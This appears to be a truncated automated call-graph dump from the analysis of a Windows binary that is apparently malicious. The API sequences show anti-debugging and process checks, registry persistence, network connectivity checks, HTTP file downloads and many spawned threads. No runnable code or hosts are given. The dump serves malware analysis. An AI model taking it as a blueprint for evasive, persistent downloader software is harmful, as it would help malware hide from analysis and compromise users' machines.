2d3699a InitializeCriticalSection CreateThread 65047 2d369db 65046->65047 65048 2d369b8 GetHandleInformation 65046->65048 65648 2d37430 65046->65648 65286 2d26bc0 memset 65047->65286 65048->65047 65051 2d369ce 65048->65051 65054 2d36b07 65049->65054 65055 2d36ad6 IsUserAnAdmin 65049->65055 65050->65049 65053 2d36ac3 GetCurrentProcess 65050->65053 65051->65047 65056 2d369d4 FindCloseChangeNotification 65051->65056 65053->65049 65057 2d36b0d StrStrIA 65054->65057 65055->65054 65059 2d36ae0 StrStrIA 65055->65059 65056->65047 65060 2d36b23 StrStrIA 65057->65060 65061 2d370f9 65057->65061 65059->65057 65064 2d36af8 65059->65064 65060->65061 65065 2d36b39 StrStrIA 65060->65065 65313 2d35230 203 API calls 65061->65313 65062 2d369f7 GetHandleInformation 65063 2d36a1a 65062->65063 65066 2d36a0d 65062->65066 65304 2d39c50 254 API calls 65063->65304 65307 2d3a240 CreateMutexA CreateThread GetHandleInformation CloseHandle 65064->65307 65065->65061 65072 2d36b4f StrStrIA 65065->65072 65066->65063 65073 2d36a13 CloseHandle 65066->65073 65070 2d37100 StrStrIA 65075 2d37112 GetModuleHandleA GetProcAddress 65070->65075 65076 2d37131 StrStrIA 65070->65076 65071 2d36afd 65308 2d26070 45 API calls 65071->65308 65072->65061 65078 2d36b65 StrStrIA 65072->65078 65073->65063 65074 2d36a1f 65305 2d34330 15 API calls 65074->65305 65314 2d3a040 38 API calls 65075->65314 65122 2d36b02 65076->65122 65078->65061 65081 2d36b7b StrStrIA 65078->65081 65081->65061 65084 2d36b91 StrStrIA 65081->65084 65082 2d36a29 65082->65044 65085 2d36a2f CreateThread 65082->65085 65083 2d371d7 CreateThread 65083->65013 65086 2d371f2 GetHandleInformation 65083->65086 65737 2d27d50 25 API calls 65083->65737 65084->65061 65088 2d36ba7 StrStrIA 65084->65088 65089 2d36a46 GetHandleInformation 65085->65089 65090 2d36a69 GetProcessHeap HeapValidate 65085->65090 65739 2d35020 267 API calls 65085->65739 65086->65013 65092 2d37208 65086->65092 65088->65061 65095 2d36bbd StrStrIA 65088->65095 65089->65090 65091 2d36a5c 65089->65091 65090->65044 65093 2d36a7f GetProcessHeap HeapFree 65090->65093 65091->65090 65096 2d36a62 CloseHandle 65091->65096 65092->65013 65097 2d3720e CloseHandle 65092->65097 65093->65044 65094 2d3714f GetCurrentProcessId 65316 2d44450 OpenProcess 65094->65316 65095->65061 65099 2d36bd3 StrStrIA 65095->65099 65096->65090 65097->65013 65099->65061 65101 2d36be9 StrStrIA 65099->65101 65101->65061 65103 2d36bff StrStrIA 65101->65103 65102 2d3715e GetCurrentThreadId GetThreadDesktop GetUserObjectInformationA 65102->65083 65105 2d37188 lstrcmpiA 65102->65105 65103->65061 65104 2d36c15 StrStrIA 65103->65104 65104->65061 65106 2d36c2b StrStrIA 65104->65106 65105->65083 65107 2d3719e CreateThread 65105->65107 65106->65061 65108 2d36c41 StrStrIA 65106->65108 65107->65083 65109 2d371b4 GetHandleInformation 65107->65109 65724 2d2ba40 122 API calls 65107->65724 65110 2d37053 StrStrIA 65108->65110 65111 2d36c57 65108->65111 65109->65083 65112 2d371ca 65109->65112 65113 2d370f0 65110->65113 65114 2d37069 StrStrIA 65110->65114 65309 2d35230 203 API calls 65111->65309 65112->65083 65116 2d371d0 CloseHandle 65112->65116 65312 2d35230 203 API calls 65113->65312 65114->65113 65117 2d3707b StrStrIA 65114->65117 65116->65083 65117->65113 65120 2d3708d StrStrIA 65117->65120 65118 2d36c5e 65310 2d27ce0 14 API calls 65118->65310 65120->65113 65123 2d3709f StrStrIA 65120->65123 65122->65083 65315 2d2d7a0 7 API calls 65122->65315 65123->65113 65125 2d370b1 StrStrIA 65123->65125 65124 2d36c63 65124->65122 65126 2d36c6b CreateThread 65124->65126 65125->65113 65127 2d370c3 StrStrIA 65125->65127 65128 2d36c89 GetHandleInformation 65126->65128 65129 2d36ca8 CreateThread 65126->65129 65730 2d3b3f0 460 API calls 65126->65730 65127->65113 65130 2d370d5 StrStrIA 65127->65130 65128->65129 65131 2d36c9b 65128->65131 65132 2d36cbf GetHandleInformation 65129->65132 65133 2d36cde CreateThread 65129->65133 65732 2d3ea80 461 API calls 65129->65732 65130->65113 65136 2d370e7 65130->65136 65131->65129 65137 2d36ca1 CloseHandle 65131->65137 65132->65133 65138 2d36cd1 65132->65138 65134 2d36cf5 GetHandleInformation 65133->65134 65135 2d36d14 CreateThread 65133->65135 65734 2d40070 503 API calls 65133->65734 65134->65135 65139 2d36d07 65134->65139 65140 2d36d2b GetHandleInformation 65135->65140 65141 2d36d4a CreateThread 65135->65141 65735 2d408e0 503 API calls 65135->65735 65311 2d35230 203 API calls 65136->65311 65137->65129 65138->65133 65143 2d36cd7 CloseHandle 65138->65143 65139->65135 65144 2d36d0d CloseHandle 65139->65144 65140->65141 65145 2d36d3d 65140->65145 65146 2d36d61 GetHandleInformation 65141->65146 65147 2d36d80 CreateThread 65141->65147 65736 2d3f1b0 504 API calls 65141->65736 65143->65133 65144->65135 65145->65141 65148 2d36d43 CloseHandle 65145->65148 65146->65147 65149 2d36d73 65146->65149 65150 2d36d97 GetHandleInformation 65147->65150 65151 2d36db6 CreateThread 65147->65151 65738 2d3c670 461 API calls 65147->65738 65148->65141 65149->65147 65154 2d36d79 CloseHandle 65149->65154 65150->65151 65155 2d36da9 65150->65155 65152 2d36dcd GetHandleInformation 65151->65152 65153 2d36dec CreateThread 65151->65153 65740 2d3c710 505 API calls 65151->65740 65152->65153 65156 2d36ddf 65152->65156 65157 2d36e03 GetHandleInformation 65153->65157 65158 2d36e22 CreateThread 65153->65158 65718 2d41060 503 API calls 65153->65718 65154->65147 65155->65151 65159 2d36daf CloseHandle 65155->65159 65156->65153 65160 2d36de5 CloseHandle 65156->65160 65157->65158 65161 2d36e15 65157->65161 65162 2d36e39 GetHandleInformation 65158->65162 65163 2d36e58 CreateThread 65158->65163 65719 2d420f0 465 API calls 65158->65719 65159->65151 65160->65153 65161->65158 65164 2d36e1b CloseHandle 65161->65164 65162->65163 65165 2d36e4b 65162->65165 65166 2d36e6f GetHandleInformation 65163->65166 65167 2d36e8e CreateThread 65163->65167 65721 2d42de0 465 API calls 65163->65721 65164->65158 65165->65163 65170 2d36e51 CloseHandle 65165->65170 65166->65167 65171 2d36e81 65166->65171 65168 2d36ea5 GetHandleInformation 65167->65168 65169 2d36ec4 CreateThread 65167->65169 65722 2d42ed0 460 API calls 65167->65722 65168->65169 65172 2d36eb7 65168->65172 65173 2d36edb GetHandleInformation 65169->65173 65174 2d36efa CreateThread 65169->65174 65723 2d3f990 460 API calls 65169->65723 65170->65163 65171->65167 65175 2d36e87 CloseHandle 65171->65175 65172->65169 65176 2d36ebd CloseHandle 65172->65176 65173->65174 65177 2d36eed 65173->65177 65178 2d36f11 GetHandleInformation 65174->65178 65179 2d36f30 CreateThread 65174->65179 65725 2d430b0 465 API calls 65174->65725 65175->65167 65176->65169 65177->65174 65180 2d36ef3 CloseHandle 65177->65180 65178->65179 65181 2d36f23 65178->65181 65182 2d36f47 GetHandleInformation 65179->65182 65183 2d36f66 CreateThread 65179->65183 65726 2d44030 461 API calls 65179->65726 65180->65174 65181->65179 65186 2d36f29 CloseHandle 65181->65186 65182->65183 65187 2d36f59 65182->65187 65184 2d36f7d GetHandleInformation 65183->65184 65185 2d36f9c CreateThread 65183->65185 65727 2d443a0 461 API calls 65183->65727 65184->65185 65188 2d36f8f 65184->65188 65189 2d36fb3 GetHandleInformation 65185->65189 65190 2d36fd2 CreateThread 65185->65190 65728 2d41460 463 API calls 65185->65728 65186->65179 65187->65183 65191 2d36f5f CloseHandle 65187->65191 65188->65185 65192 2d36f95 CloseHandle 65188->65192 65189->65190 65193 2d36fc5 65189->65193 65194 2d36fe9 GetHandleInformation 65190->65194 65195 2d37008 CreateThread 65190->65195 65731 2d416e0 461 API calls 65190->65731 65191->65183 65192->65185 65193->65190 65196 2d36fcb CloseHandle 65193->65196 65194->65195 65197 2d36ffb 65194->65197 65195->65122 65198 2d37023 GetHandleInformation 65195->65198 65733 2d27e40 400 API calls 65195->65733 65196->65190 65197->65195 65199 2d37001 CloseHandle 65197->65199 65198->65122 65200 2d3703d 65198->65200 65199->65195 65200->65122 65201 2d37047 CloseHandle 65200->65201 65201->65122 65203 2d23530 65202->65203 65204 2d235a8 PathFileExistsA 65203->65204 65205 2d235b8 RegOpenKeyExA RegQueryValueExA 65204->65205 65206 2d235ec 65204->65206 65205->65206 65207 2d235f4 RegCloseKey 65206->65207 65208 2d235fb 65206->65208 65207->65208 65209 2d455c0 GetSystemWindowsDirectoryA 65208->65209 65210 2d45600 65209->65210 65210->65210 65211 2d45607 GetVolumeInformationA 65210->65211 65212 2d45648 65211->65212 65213 2d4568b _snprintf 65212->65213 65214 2d456c1 _snprintf 65212->65214 65213->65212 65216 2d367e3 SHGetFolderPathA PathAddBackslashA GetModuleFileNameA 65214->65216 65216->65013 65216->65014 65218 2d23932 65217->65218 65219 2d23822 GetModuleHandleA 65217->65219 65238 2d23220 memset 65218->65238 65220 2d23843 GetProcAddress 65219->65220 65221 2d2385e 65219->65221 65220->65221 65222 2d23851 GetCurrentProcess 65220->65222 65223 2d23864 IsUserAnAdmin 65221->65223 65224 2d23888 GetModuleHandleA 65221->65224 65222->65221 65223->65224 65225 2d2386e StrStrIA 65223->65225 65226 2d238b5 65224->65226 65227 2d2389a GetProcAddress 65224->65227 65225->65224 65237 2d23921 65225->65237 65229 2d238c1 IsUserAnAdmin 65226->65229 65230 2d238e4 IsUserAnAdmin 65226->65230 65227->65226 65228 2d238a8 GetCurrentProcess 65227->65228 65228->65226 65229->65230 65231 2d238c7 PathFindFileNameA StrStrIA 65229->65231 65232 2d23900 IsUserAnAdmin 65230->65232 65233 2d238ea StrStrIA 65230->65233 65231->65230 65231->65237 65234 2d23906 StrStrIA 65232->65234 65232->65237 65233->65232 65233->65237 65235 2d2391c 65234->65235 65234->65237 65236 2d23750 2 API calls 65235->65236 65236->65237 65237->65218 65330 2d44c00 memset GetProcessHeap RtlAllocateHeap 65238->65330 65241 2d23417 65241->65024 65244 2d23273 GetEnvironmentVariableA PathAddBackslashA GetVolumeInformationA 65246 2d232b2 65244->65246 65247 2d232b9 RegOpenKeyExA 65244->65247 65245 2d233c5 GetProcessHeap HeapValidate 65248 2d233ec 65245->65248 65249 2d233dd GetProcessHeap HeapFree 65245->65249 65246->65247 65250 2d232d8 RegQueryValueExA RegCloseKey 65247->65250 65251 2d232ff 65247->65251 65252 2d233f3 GetProcessHeap HeapValidate 65248->65252 65253 2d2340e 65248->65253 65249->65248 65250->65251 65255 2d23317 65251->65255 65256 2d2331e CharUpperA 65251->65256 65252->65253 65254 2d233ff GetProcessHeap HeapFree 65252->65254 65253->65024 65254->65253 65257 2d23323 CharUpperA _snprintf 65255->65257 65256->65257 65259 2d23350 65257->65259 65258 2d233bd 65258->65245 65259->65258 65259->65259 65260 2d23387 _snprintf 65259->65260 65260->65259 65262 2d23981 GetTickCount GetModuleHandleA 65261->65262 65263 2d2396a GetProcAddress 65261->65263 65265 2d239b0 GetProcAddress 65262->65265 65266 2d239c7 _snprintf 65262->65266 65263->65262 65264 2d2397a 65263->65264 65264->65262 65265->65266 65267 2d239c0 65265->65267 65266->65026 65267->65266 65269 2d368e2 65268->65269 65271 2d3ab08 65268->65271 65276 2d332c0 IsUserAnAdmin 65269->65276 65270 2d3ab36 65272 2d3abaa GetModuleHandleA 65270->65272 65271->65269 65271->65270 65271->65272 65273 2d3abf5 65272->65273 65274 2d3abd5 GetProcAddress 65272->65274 65273->65269 65274->65273 65275 2d3abe8 GetCurrentProcess 65274->65275 65275->65273 65277 2d33337 RegOpenKeyExA 65276->65277 65278 2d332dd RegOpenKeyExA 65276->65278 65281 2d33386 65277->65281 65282 2d3335f RegQueryValueExA RegCloseKey 65277->65282 65279 2d33305 RegQueryValueExA RegCloseKey 65278->65279 65280 2d3332c 65278->65280 65279->65280 65280->65277 65280->65281 65281->65031 65281->65032 65282->65281 65284 2d23790 65283->65284 65284->65284 65285 2d237aa CreateMutexA 65284->65285 65285->65046 65363 2d34af0 IsNetworkAlive 65286->65363 65288 2d26bee 65289 2d26bf2 65288->65289 65290 2d26c08 65288->65290 65289->65290 65291 2d26bf8 Sleep 65289->65291 65292 2d26c1f IsUserAnAdmin 65290->65292 65392 2d263b0 memset DnsFlushResolverCache gethostbyname 65290->65392 65294 2d34af0 11 API calls 65291->65294 65370 2d26750 memset memset 65292->65370 65294->65289 65297 2d26cfe CreateThread 65297->65062 65297->65063 65729 2d36510 439 API calls 65297->65729 65298 2d26c8d WaitForMultipleObjects 65301 2d26c3e 65298->65301 65300 2d26cc2 GetHandleInformation 65300->65301 65301->65297 65301->65298 65301->65300 65303 2d26cd7 CloseHandle 65301->65303 65380 2d26110 memset memset memset 65301->65380 65302 2d26c60 CreateThread 65302->65301 65630 2d26870 65302->65630 65303->65301 65304->65074 65640 2d398e0 23 API calls 65304->65640 65305->65082 65306->65040 65307->65071 65643 2d3a2b0 7 API calls 65307->65643 65308->65122 65309->65118 65644 2d3a2b0 7 API calls 65309->65644 65310->65124 65311->65122 65645 2d3a2b0 7 API calls 65311->65645 65312->65122 65646 2d3a2b0 7 API calls 65312->65646 65313->65070 65647 2d3a2b0 7 API calls 65313->65647 65314->65076 65315->65094 65317 2d3715a 65316->65317 65318 2d44475 OpenProcessToken 65316->65318 65317->65083 65317->65102 65319 2d44522 GetHandleInformation 65318->65319 65320 2d4448a GetTokenInformation 65318->65320 65319->65317 65321 2d44538 65319->65321 65322 2d444a4 CharUpperA 65320->65322 65329 2d444d2 65320->65329 65321->65317 65324 2d4453e CloseHandle 65321->65324 65325 2d444c0 65322->65325 65323 2d44506 GetHandleInformation 65323->65319 65326 2d44515 65323->65326 65324->65317 65327 2d444d4 CharUpperA 65325->65327 65325->65329 65326->65319 65328 2d4451b FindCloseChangeNotification 65326->65328 65327->65329 65328->65319 65329->65319 65329->65323 65331 2d44c59 memset 65330->65331 65343 2d23253 65330->65343 65332 2d44c6d GetUserNameA 65331->65332 65331->65343 65333 2d44ca5 65332->65333 65334 2d44c7e GetLastError 65332->65334 65360 2d3a8e0 memset StrStrIA 65333->65360 65334->65333 65336 2d44c89 65334->65336 65359 2d33d90 7 API calls 65336->65359 65338 2d44c94 65339 2d44c9a GetUserNameA 65338->65339 65338->65343 65339->65333 65339->65343 65340 2d44cb3 StrChrIA 65341 2d44cd0 lstrcpynA 65340->65341 65342 2d44cab 65340->65342 65341->65342 65342->65340 65342->65343 65343->65241 65344 2d44d00 memset GetProcessHeap HeapAlloc 65343->65344 65345 2d44d5a memset 65344->65345 65346 2d23266 65344->65346 65345->65346 65347 2d44d6e GetComputerNameA 65345->65347 65346->65244 65346->65245 65348 2d44da6 65347->65348 65349 2d44d7f GetLastError 65347->65349 65362 2d3a8e0 memset StrStrIA 65348->65362 65349->65348 65351 2d44d8a 65349->65351 65361 2d33d90 7 API calls 65351->65361 65353 2d44d95 65353->65346 65354 2d44d9b GetComputerNameA 65353->65354 65354->65346 65354->65348 65355 2d44db4 StrChrIA 65356 2d44dd1 lstrcpynA 65355->65356 65357 2d44dac 65355->65357 65356->65357 65357->65346 65357->65355 65358 2d44dea 65357->65358 65358->65346 65359->65338 65360->65342 65361->65353 65362->65357 65364 2d34b11 IsUserAnAdmin 65363->65364 65365 2d34be7 65363->65365 65366 2d34b21 memset lstrcpynA StrNCatA InternetCheckConnectionA 65364->65366 65367 2d34b1b DnsFlushResolverCache 65364->65367 65365->65288 65368 2d34bdb 65366->65368 65369 2d34b89 memset lstrcpynA StrNCatA InternetCheckConnectionA 65366->65369 65367->65366 65368->65288 65369->65368 65371 2d2680a RegOpenKeyExA 65370->65371 65372 2d2679c lstrcpynA 65370->65372 65373 2d26827 65371->65373 65374 2d2685a 65371->65374 65379 2d267c0 65372->65379 65377 2d2684b RegDeleteValueA 65373->65377 65378 2d2682b RegSetValueExA 65373->65378 65375 2d26862 RegCloseKey 65374->65375 65376 2d26869 65374->65376 65375->65376 65376->65301 65377->65374 65378->65374 65379->65371 65381 2d261e0 65380->65381 65381->65381 65382 2d26210 strtol 65381->65382 65382->65382 65383 2d2623a 65382->65383 65384 2d26298 strstr 65383->65384 65385 2d262b5 65384->65385 65386 2d262be strstr 65384->65386 65385->65302 65386->65385 65387 2d262d1 strtol 65386->65387 65387->65385 65391 2d262e5 GetProcessHeap RtlAllocateHeap 65387->65391 65389 2d263a5 65389->65302 65390 2d26369 memset memset _snprintf 65390->65389 65391->65389 65391->65390 65393 2d26414 GetTempPathA GetTempFileNameA 65392->65393 65394 2d26708 PathFileExistsA 65392->65394 65397 2d26444 65393->65397 65395 2d26735 65394->65395 65396 2d26719 SetFileAttributesA DeleteFileA 65394->65396 65395->65292 65395->65297 65396->65395 65442 2d21720 IsDebuggerPresent 65397->65442 65399 2d26454 65462 2d34680 memset 65399->65462 65401 2d26483 65402 2d264a7 65401->65402 65403 2d34680 68 API calls 65401->65403 65402->65394 65512 2d27220 65402->65512 65403->65402 65406 2d264cd calloc calloc 65407 2d264e4 exit 65406->65407 65408 2d264eb calloc 65406->65408 65407->65408 65409 2d264f7 exit 65408->65409 65410 2d264fe calloc 65408->65410 65409->65410 65411 2d26521 exit 65410->65411 65412 2d26528 calloc 65410->65412 65411->65412 65413 2d26534 exit 65412->65413 65414 2d2653b calloc 65412->65414 65413->65414 65415 2d26566 calloc 65414->65415 65416 2d2655e exit 65414->65416 65417 2d26573 exit 65415->65417 65418 2d2657b calloc 65415->65418 65416->65415 65417->65418 65419 2d265a3 exit 65418->65419 65420 2d265ab calloc 65418->65420 65419->65420 65421 2d265c4 65420->65421 65422 2d265bc exit 65420->65422 65529 2d21ac0 65421->65529 65422->65421 65424 2d265e9 65425 2d21ac0 8 API calls 65424->65425 65426 2d265f5 65425->65426 65427 2d21ac0 8 API calls 65426->65427 65428 2d26600 65427->65428 65536 2d21b30 65428->65536 65433 2d266c8 65549 2d21970 free free 65433->65549 65434 2d26640 65548 2d21970 free free 65434->65548 65436 2d266d1 65550 2d21970 free free 65436->65550 65438 2d266da 65551 2d21970 free free 65438->65551 65440 2d266e3 GetProcessHeap HeapValidate 65440->65394 65441 2d266fc GetProcessHeap HeapFree 65440->65441 65441->65394 65443 2d21742 FindWindowA 65442->65443 65444 2d2183b 65442->65444 65443->65444 65445 2d21758 memset CreateToolhelp32Snapshot 65443->65445 65444->65399 65446 2d21783 Process32First 65445->65446 65447 2d217f1 65445->65447 65449 2d217a3 StrStrIA 65446->65449 65453 2d2182e 65447->65453 65552 2d44800 memset CreateToolhelp32Snapshot 65447->65552 65451 2d217b7 Process32Next 65449->65451 65452 2d217c3 65449->65452 65450 2d217ff 65450->65453 65454 2d44800 7 API calls 65450->65454 65451->65449 65451->65452 65452->65447 65455 2d217d3 GetHandleInformation 65452->65455 65453->65399 65456 2d2180d 65454->65456 65455->65447 65457 2d217e3 65455->65457 65456->65453 65459 2d44800 7 API calls 65456->65459 65457->65447 65458 2d217ea FindCloseChangeNotification 65457->65458 65458->65447 65460 2d2181b 65459->65460 65460->65453 65461 2d2181f PathFileExistsA 65460->65461 65461->65453 65463 2d346d3 65462->65463 65464 2d34ae5 65462->65464 65463->65464 65465 2d34780 InternetOpenA 65463->65465 65468 2d34719 65463->65468 65469 2d346ee GetProcessHeap HeapAlloc 65463->65469 65464->65401 65466 2d347a2 InternetConnectA 65465->65466 65467 2d34a8a 65465->65467 65466->65467 65473 2d347c1 HttpOpenRequestA 65466->65473 65474 2d34ab3 65467->65474 65475 2d34a97 GetProcessHeap HeapValidate 65467->65475 65468->65464 65472 2d34724 memcpy 65468->65472 65470 2d34716 65469->65470 65471 2d3470a memset 65469->65471 65470->65468 65471->65470 65486 2d34740 65472->65486 65473->65467 65477 2d347f9 65473->65477 65479 2d34ac5 65474->65479 65480 2d34abf InternetCloseHandle 65474->65480 65475->65474 65478 2d34aa7 GetProcessHeap HeapFree 65475->65478 65481 2d3481d 65477->65481 65484 2d3480a HttpAddRequestHeadersA 65477->65484 65478->65474 65482 2d34acf 65479->65482 65483 2d34acc InternetCloseHandle 65479->65483 65480->65479 65485 2d34820 HttpAddRequestHeadersA 65481->65485 65487 2d34ad6 InternetCloseHandle 65482->65487 65488 2d34ad9 65482->65488 65483->65482 65484->65485 65489 2d34865 HttpSendRequestA 65485->65489 65490 2d34835 _snprintf HttpAddRequestHeadersA 65485->65490 65486->65465 65487->65488 65488->65401 65489->65467 65492 2d34887 HttpQueryInfoA 65489->65492 65490->65489 65492->65467 65493 2d348aa 65492->65493 65493->65467 65494 2d348b7 CreateFileA 65493->65494 65494->65467 65495 2d348e5 GetProcessHeap HeapAlloc 65494->65495 65496 2d34905 memset InternetReadFile 65495->65496 65497 2d349c9 65495->65497 65500 2d34934 65496->65500 65501 2d349ad GetProcessHeap HeapValidate 65496->65501 65498 2d349f0 65497->65498 65499 2d349cd GetHandleInformation 65497->65499 65504 2d27220 16 API calls 65498->65504 65499->65498 65503 2d349e3 65499->65503 65500->65501 65505 2d3493b 6 API calls 65500->65505 65501->65497 65502 2d349bd GetProcessHeap HeapFree 65501->65502 65502->65497 65503->65498 65507 2d349e9 CloseHandle 65503->65507 65508 2d34a00 65504->65508 65505->65495 65506 2d34998 GetProcessHeap HeapFree 65505->65506 65506->65495 65507->65498 65508->65467 65562 2d27140 65508->65562 65510 2d34a6c GetProcessHeap HeapValidate 65510->65467 65511 2d34a7c GetProcessHeap HeapFree 65510->65511 65511->65467 65513 2d27366 65512->65513 65514 2d27235 CreateFileA 65512->65514 65516 2d2736d IsBadWritePtr 65513->65516 65518 2d264c2 65513->65518 65514->65513 65515 2d27257 GetFileSizeEx 65514->65515 65517 2d27275 65515->65517 65527 2d27335 65515->65527 65516->65518 65521 2d27281 GetProcessHeap RtlAllocateHeap 65517->65521 65524 2d272af 65517->65524 65518->65394 65518->65406 65519 2d2734a GetHandleInformation 65519->65513 65520 2d27359 65519->65520 65520->65513 65522 2d2735f FindCloseChangeNotification 65520->65522 65523 2d272a0 memset 65521->65523 65521->65524 65522->65513 65523->65524 65525 2d27311 GetProcessHeap HeapValidate 65524->65525 65526 2d272cc SetFilePointer LockFile ReadFile UnlockFile 65524->65526 65524->65527 65525->65527 65528 2d27325 GetProcessHeap HeapFree 65525->65528 65526->65525 65526->65527 65527->65513 65527->65519 65528->65527 65530 2d21ad0 65529->65530 65530->65530 65531 2d21ad7 65530->65531 65573 2d219e0 65531->65573 65533 2d21aea 65583 2d22870 calloc exit free 65533->65583 65535 2d21af4 65535->65424 65537 2d21b46 65536->65537 65538 2d219e0 5 API calls 65537->65538 65539 2d21b5d 65538->65539 65540 2d219e0 5 API calls 65539->65540 65541 2d21b66 65540->65541 65542 2d219e0 5 API calls 65541->65542 65543 2d21b6f 65542->65543 65544 2d219e0 5 API calls 65543->65544 65545 2d21b77 65544->65545 65584 2d22ce0 65545->65584 65547 2d21b92 _strrev 65547->65434 65548->65433 65549->65436 65550->65438 65551->65440 65553 2d44847 Process32First 65552->65553 65554 2d4483c 65552->65554 65555 2d44867 StrStrIA 65553->65555 65554->65450 65556 2d44876 Process32Next 65555->65556 65557 2d44882 65555->65557 65556->65555 65556->65557 65558 2d448b0 65557->65558 65559 2d44892 GetHandleInformation 65557->65559 65558->65450 65559->65558 65560 2d448a2 65559->65560 65560->65558 65561 2d448a9 CloseHandle 65560->65561 65561->65558 65563 2d27210 65562->65563 65564 2d27156 65562->65564 65563->65510 65564->65563 65565 2d27167 CreateFileA 65564->65565 65566 2d27186 SetFilePointer LockFile WriteFile UnlockFile 65565->65566 65567 2d27205 65565->65567 65568 2d271db 65566->65568 65569 2d271cb SetEndOfFile 65566->65569 65567->65510 65568->65567 65570 2d271e9 GetHandleInformation 65568->65570 65569->65568 65570->65567 65571 2d271f8 65570->65571 65571->65567 65572 2d271fe CloseHandle 65571->65572 65572->65567 65574 2d21a0a 65573->65574 65575 2d219ee 65573->65575 65576 2d21a16 malloc 65574->65576 65577 2d21a9a 65574->65577 65575->65533 65578 2d21a59 memcpy 65576->65578 65579 2d21a31 65576->65579 65577->65533 65581 2d21a7a free 65578->65581 65582 2d21a6f 65578->65582 65579->65579 65580 2d21a3f free exit 65579->65580 65580->65578 65581->65577 65582->65581 65583->65535 65585 2d22d0b 65584->65585 65586 2d22cf9 65584->65586 65585->65547 65586->65585 65587 2d22db6 calloc 65586->65587 65588 2d22d99 65586->65588 65590 2d22dd7 calloc 65587->65590 65591 2d22dcf exit 65587->65591 65619 2d22ae0 10 API calls 65588->65619 65592 2d22df2 calloc 65590->65592 65593 2d22dea exit 65590->65593 65591->65590 65595 2d22e05 exit 65592->65595 65596 2d22e0d calloc 65592->65596 65593->65592 65594 2d22dad 65594->65547 65595->65596 65597 2d22e20 exit 65596->65597 65598 2d22e28 65596->65598 65597->65598 65601 2d22e5a 65598->65601 65612 2d22eca 65598->65612 65613 2d22a60 calloc 65598->65613 65600 2d22e60 calloc 65600->65591 65600->65601 65601->65600 65601->65612 65602 2d230e0 free 65603 2d23100 65602->65603 65604 2d2310a free 65602->65604 65603->65603 65603->65604 65605 2d23121 65604->65605 65606 2d2312b free 65604->65606 65605->65605 65605->65606 65607 2d23142 65606->65607 65608 2d2314c free 65606->65608 65607->65607 65607->65608 65609 2d23164 65608->65609 65610 2d231a9 65608->65610 65609->65610 65611 2d23192 free 65609->65611 65610->65547 65611->65609 65612->65602 65614 2d22a86 65613->65614 65615 2d22a7e exit 65613->65615 65620 2d22990 65614->65620 65615->65614 65617 2d22aa7 free 65617->65598 65619->65594 65621 2d229a3 65620->65621 65622 2d229a6 calloc calloc 65620->65622 65621->65622 65623 2d229c3 calloc 65622->65623 65624 2d229bb exit 65622->65624 65625 2d229d4 exit 65623->65625 65626 2d229dc 65623->65626 65624->65623 65625->65626 65626->65626 65627 2d22a1b free 65626->65627 65628 2d22a42 free 65627->65628 65629 2d22a35 65627->65629 65628->65617 65629->65628 65629->65629 65631 2d268e0 65630->65631 65632 2d2687d 65630->65632 65633 2d268be GetProcessHeap HeapValidate 65632->65633 65634 2d263b0 159 API calls 65632->65634 65633->65631 65635 2d268d4 GetProcessHeap HeapFree 65633->65635 65636 2d2688c 65634->65636 65635->65631 65636->65633 65637 2d26890 IsUserAnAdmin 65636->65637 65638 2d26750 7 API calls 65637->65638 65639 2d268b7 65638->65639 65641 2d395d0 44 API calls 65640->65641 65642 2d39420 12 API calls 65641->65642 65672 2d37441 65648->65672 65650 2d37813 Sleep 65650->65672 65651 2d37460 OpenProcess 65652 2d374a0 GetProcessTimes 65651->65652 65653 2d374fa EnterCriticalSection 65651->65653 65652->65672 65653->65672 65654 2d3754a OpenProcess 65655 2d37597 GetProcessTimes 65654->65655 65656 2d375e8 EnterCriticalSection 65654->65656 65655->65672 65658 2d37613 LeaveCriticalSection VirtualQuery VirtualQuery 65656->65658 65656->65672 65657 2d374d8 GetHandleInformation 65657->65653 65657->65672 65658->65672 65659 2d375c6 GetHandleInformation 65659->65656 65659->65672 65660 2d3751f LeaveCriticalSection 65786 2d37270 11 API calls 65660->65786 65661 2d374f3 CloseHandle 65661->65653 65664 2d375e1 CloseHandle 65664->65656 65665 2d376e4 EnterCriticalSection GetProcessHeap HeapAlloc 65666 2d37711 OpenProcess 65665->65666 65667 2d377c4 LeaveCriticalSection 65665->65667 65670 2d3775a GetProcessTimes 65666->65670 65666->65672 65667->65672 65668 2d377eb GetProcessHeap HeapValidate 65669 2d37800 GetProcessHeap HeapFree 65668->65669 65668->65672 65669->65672 65670->65672 65671 2d37789 GetHandleInformation 65671->65672 65672->65650 65672->65651 65672->65653 65672->65654 65672->65656 65672->65657 65672->65658 65672->65659 65672->65660 65672->65661 65672->65664 65672->65665 65672->65667 65672->65668 65672->65671 65673 2d377a8 CloseHandle 65672->65673 65741 2d37300 CreateToolhelp32Snapshot 65672->65741 65755 2d448d0 65672->65755 65673->65672 65675 2d37b40 65674->65675 65675->65675 65676 2d37b73 PathFindFileNameA 65675->65676 65677 2d37c09 65676->65677 65678 2d37b88 65676->65678 65679 2d27220 16 API calls 65678->65679 65680 2d37b9c 65679->65680 65680->65677 65681 2d37ba9 FindFirstChangeNotificationA 65680->65681 65681->65677 65682 2d37bc4 65681->65682 65683 2d37bd0 WaitForSingleObject 65682->65683 65684 2d37bd9 FindNextChangeNotification 65683->65684 65685 2d37bfc Sleep 65683->65685 65684->65685 65686 2d37be0 65684->65686 65685->65683 65686->65685 65687 2d37be9 65686->65687 65688 2d27140 8 API calls 65687->65688 65688->65685 65690 2d37835 65689->65690 65690->65690 65691 2d37a85 IsUserAnAdmin 65690->65691 65692 2d37849 PathFileExistsA 65690->65692 65693 2d37a8f RegOpenKeyExA 65691->65693 65692->65691 65694 2d3785c GetProcessHeap HeapAlloc 65692->65694 65699 2d37ac5 CreateEventA 65693->65699 65700 2d37b1a 65693->65700 65694->65691 65696 2d3787f memset GetShortPathNameA RegOpenKeyExA 65694->65696 65697 2d378c3 RegQueryValueExA 65696->65697 65698 2d37a0b RegOpenKeyExA 65696->65698 65701 2d379fb RegFlushKey 65697->65701 65702 2d378eb GetProcessHeap HeapAlloc 65697->65702 65704 2d37a63 GetProcessHeap HeapValidate 65698->65704 65705 2d37a2a RegSetValueExA RegFlushKey 65698->65705 65699->65700 65703 2d37ad6 RegNotifyChangeKeyValue 65699->65703 65708 2d37a5d RegCloseKey 65701->65708 65702->65701 65706 2d37907 memset RegQueryValueExA StrStrIA 65702->65706 65707 2d37af0 WaitForSingleObject 65703->65707 65704->65691 65709 2d37a79 GetProcessHeap HeapFree 65704->65709 65705->65708 65710 2d379d9 GetProcessHeap HeapValidate 65706->65710 65716 